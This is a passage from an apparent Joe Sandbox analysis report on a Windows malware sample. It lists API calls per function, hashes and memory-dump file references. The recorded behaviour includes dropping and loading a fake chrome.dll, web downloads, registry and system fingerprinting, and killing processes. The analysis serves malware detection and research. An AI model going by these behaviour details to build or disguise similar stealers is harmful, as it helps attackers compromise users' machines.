                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess$DefaultLangUser
                            • String ID: *
                            • API String ID: 1494266314-163128923
                            • Opcode ID: d420a1274cc187277ec0289162fc2e1b8d46b060d7d9ca8d2da7db034868d9c6
                            • Instruction ID: 5e8fa8bebd66076cfa0895565b30fc26a0ff7a994166f2f223a76ef040f4351f
                            • Opcode Fuzzy Hash: d420a1274cc187277ec0289162fc2e1b8d46b060d7d9ca8d2da7db034868d9c6
                            • Instruction Fuzzy Hash: 00F08230908209EFD3559FE0F40D75CFB31EB05707F114295FA49D61C5C6746A40DB62
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F49850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00F408DC,C:\ProgramData\chrome.dll), ref: 00F49871
                              • Part of subcall function 00F3A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00F3A098
                            • StrCmpCA.SHLWAPI(00000000,009889B0), ref: 00F40922
                            • StrCmpCA.SHLWAPI(00000000,00988960), ref: 00F40B79
                            • StrCmpCA.SHLWAPI(00000000,00988810), ref: 00F40A0C
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                            • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00F40C35
                            Strings
                            • C:\ProgramData\chrome.dll, xrefs: 00F40C30
                            • C:\ProgramData\chrome.dll, xrefs: 00F408CD
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                            • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                            • API String ID: 585553867-663540502
                            • Opcode ID: 53de85bd5a8f8942751632c07fea223d2ac3a0015b8df53aad63195f93d7979e
                            • Instruction ID: cb02fe1decbaa708d916129ce6860d945e8944c00a61c3a453e9cf3d1041be68
                            • Opcode Fuzzy Hash: 53de85bd5a8f8942751632c07fea223d2ac3a0015b8df53aad63195f93d7979e
                            • Instruction Fuzzy Hash: 2CA158717001089FCB28EF64DD95AAD7B76FF94300F10816DE90A9F251DB34DA05DB92
                            APIs
                            • _ValidateLocalCookies.LIBCMT ref: 00FAFA1F
                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00FAFA27
                            • _ValidateLocalCookies.LIBCMT ref: 00FAFAB0
                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00FAFADB
                            • _ValidateLocalCookies.LIBCMT ref: 00FAFB30
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                            • String ID: csm
                            • API String ID: 1170836740-1018135373
                            • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                            • Instruction ID: 590e091d0688d5d5ba6d39b1a5e43e41d5f967bf4876f3aafe4797b4207fb781
                            • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                            • Instruction Fuzzy Hash: E9419171E00219ABCF10EFA9CC80ADE7BB5AF4A324F148165E918AF391D735D909DF91
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00F3501A
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F35021
                            • InternetOpenA.WININET(00F50DE3,00000000,00000000,00000000,00000000), ref: 00F3503A
                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00F35061
                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00F35091
                            • InternetCloseHandle.WININET(?), ref: 00F35109
                            • InternetCloseHandle.WININET(?), ref: 00F35116
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                            • String ID:
                            • API String ID: 3066467675-0
                            • Opcode ID: bafa44540d1d2da75a6ea881292fbd520e253116ff169ad8da83aa0b3dffe9e0
                            • Instruction ID: 4d25648ca402417b715754015bc23eacb67d6fdf72e242ec31f5599baafdeba0
                            • Opcode Fuzzy Hash: bafa44540d1d2da75a6ea881292fbd520e253116ff169ad8da83aa0b3dffe9e0
                            • Instruction Fuzzy Hash: F73107F5A40218ABDB24CF54DC89BDDB7B5AB48704F1081D8FB09A7281CB716EC59F98
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0098DC08,00000000,?,00F50E14,00000000,?,00000000), ref: 00F482C0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F482C7
                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00F482E8
                            • wsprintfA.USER32 ref: 00F4833C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB$@
                            • API String ID: 2922868504-3474575989
                            • Opcode ID: c6ff99db1f743792c2b839bd225d3696c17fca2980def001f16357d54377542f
                            • Instruction ID: 54fdd9e4013cca614e6c5e2d6cffababc516f7a9e1ee98ff98dfb199f9c4e299
                            • Opcode Fuzzy Hash: c6ff99db1f743792c2b839bd225d3696c17fca2980def001f16357d54377542f
                            • Instruction Fuzzy Hash: 8A212EB1E44208AFDB10DFD4DC49FAEBBB8FB44B14F104609F615BB280C77869018BA5
                            APIs
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00F485B6
                            • wsprintfA.USER32 ref: 00F485E9
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00F4860B
                            • RegCloseKey.ADVAPI32(00000000), ref: 00F4861C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00F48629
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                            • RegQueryValueExA.ADVAPI32(00000000,0098DBA8,00000000,000F003F,?,00000400), ref: 00F4867C
                            • lstrlen.KERNEL32(?), ref: 00F48691
                            • RegQueryValueExA.ADVAPI32(00000000,0098DD70,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00F50B3C), ref: 00F48729
                            • RegCloseKey.ADVAPI32(00000000), ref: 00F48798
                            • RegCloseKey.ADVAPI32(00000000), ref: 00F487AA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                            • String ID: %s\%s
                            • API String ID: 3896182533-4073750446
                            • Opcode ID: b6ca78f053ef52155ed32513b684cdbb7b6f62808fdc794ccb0404c027ee5ab6
                            • Instruction ID: e1f0f2adda0d291a329b5e13aca26b73d86a24ef68fcfdee9e8be48613aded8e
                            • Opcode Fuzzy Hash: b6ca78f053ef52155ed32513b684cdbb7b6f62808fdc794ccb0404c027ee5ab6
                            • Instruction Fuzzy Hash: 8F211971A10218ABDB24DB54DC85FE9B7B8FB48704F0081D8E649A6181DF70AA85CFA4
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F499C5
                            • Process32First.KERNEL32(00F3A056,00000128), ref: 00F499D9
                            • Process32Next.KERNEL32(00F3A056,00000128), ref: 00F499F2
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F49A4E
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F49A6C
                            • CloseHandle.KERNEL32(00000000), ref: 00F49A79
                            • CloseHandle.KERNEL32(00F3A056), ref: 00F49A88
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 2696918072-0
                            • Opcode ID: 88cd0d8c5fe84b3638317200801b1f7cb56b1667bd583a91aa24bccda50a5d6c
                            • Instruction ID: 665a5cc037deb3c3f769bd962fc816cb9b499bd490501d619cdf3819be4df490
                            • Opcode Fuzzy Hash: 88cd0d8c5fe84b3638317200801b1f7cb56b1667bd583a91aa24bccda50a5d6c
                            • Instruction Fuzzy Hash: C621CF75A04218DFDF35DFA1D889BDEBBB5BB48304F1041C8E909A6284D774AE84DF50
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F47834
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F4783B
                            • RegOpenKeyExA.ADVAPI32(80000002,0097BB28,00000000,00020119,00000000), ref: 00F4786D
                            • RegQueryValueExA.ADVAPI32(00000000,0098DB18,00000000,00000000,?,000000FF), ref: 00F4788E
                            • RegCloseKey.ADVAPI32(00000000), ref: 00F47898
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: 939680b0b2fdefb4beaf20ecf342ca5a2134db391a9a61cdff5235c39d8c7069
                            • Instruction ID: 631a792d9af9c201431e3041acc198d6de38bc77ae4d0a78d9a2b48fdf25c40f
                            • Opcode Fuzzy Hash: 939680b0b2fdefb4beaf20ecf342ca5a2134db391a9a61cdff5235c39d8c7069
                            • Instruction Fuzzy Hash: 6601FF75A44305BFEB10EBE4ED8DF6EBB78EB48701F104194FA45A6286D770A940DB60
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F478C4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F478CB
                            • RegOpenKeyExA.ADVAPI32(80000002,0097BB28,00000000,00020119,00F47849), ref: 00F478EB
                            • RegQueryValueExA.ADVAPI32(00F47849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00F4790A
                            • RegCloseKey.ADVAPI32(00F47849), ref: 00F47914
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: 53c0eea6ae00439880f0daf7fc17b22da14a912becc28f71272cbdd19783cd20
                            • Instruction ID: 3778f92b1e784761ec41cd4520d209e5ca25618394c0187009342c0975369fad
                            • Opcode Fuzzy Hash: 53c0eea6ae00439880f0daf7fc17b22da14a912becc28f71272cbdd19783cd20
                            • Instruction Fuzzy Hash: BA0167B5A40309BFEB10DBE4EC4DFAEB778EB04700F004594FA05A7285D7746A00DBA0
                            APIs
                            • memset.MSVCRT ref: 00F44325
                            • RegOpenKeyExA.ADVAPI32(80000001,0098D538,00000000,00020119,?), ref: 00F44344
                            • RegQueryValueExA.ADVAPI32(?,0098DE60,00000000,00000000,00000000,000000FF), ref: 00F44368
                            • RegCloseKey.ADVAPI32(?), ref: 00F44372
                            • lstrcat.KERNEL32(?,00000000), ref: 00F44397
                            • lstrcat.KERNEL32(?,0098DED8), ref: 00F443AB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValuememset
                            • String ID:
                            • API String ID: 2623679115-0
                            • Opcode ID: 7553392e098dfc1de2d471b1310feee921a7b23d9f09b4f14b6c419ee6fb4f4f
                            • Instruction ID: 1966b7d8328d3084ea484e10d8a1580ceb3875f6dd13322a2fe91e5e0fda2e0e
                            • Opcode Fuzzy Hash: 7553392e098dfc1de2d471b1310feee921a7b23d9f09b4f14b6c419ee6fb4f4f
                            • Instruction Fuzzy Hash: 5041BCB6900108ABDB25FBA0FC4AFEE773CBB88700F044658B71556185FB7566988BD1
                            APIs
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F3A13C
                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F3A161
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00F3A181
                            • ReadFile.KERNEL32(000000FF,?,00000000,00F3148F,00000000), ref: 00F3A1AA
                            • LocalFree.KERNEL32(00F3148F), ref: 00F3A1E0
                            • CloseHandle.KERNEL32(000000FF), ref: 00F3A1EA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
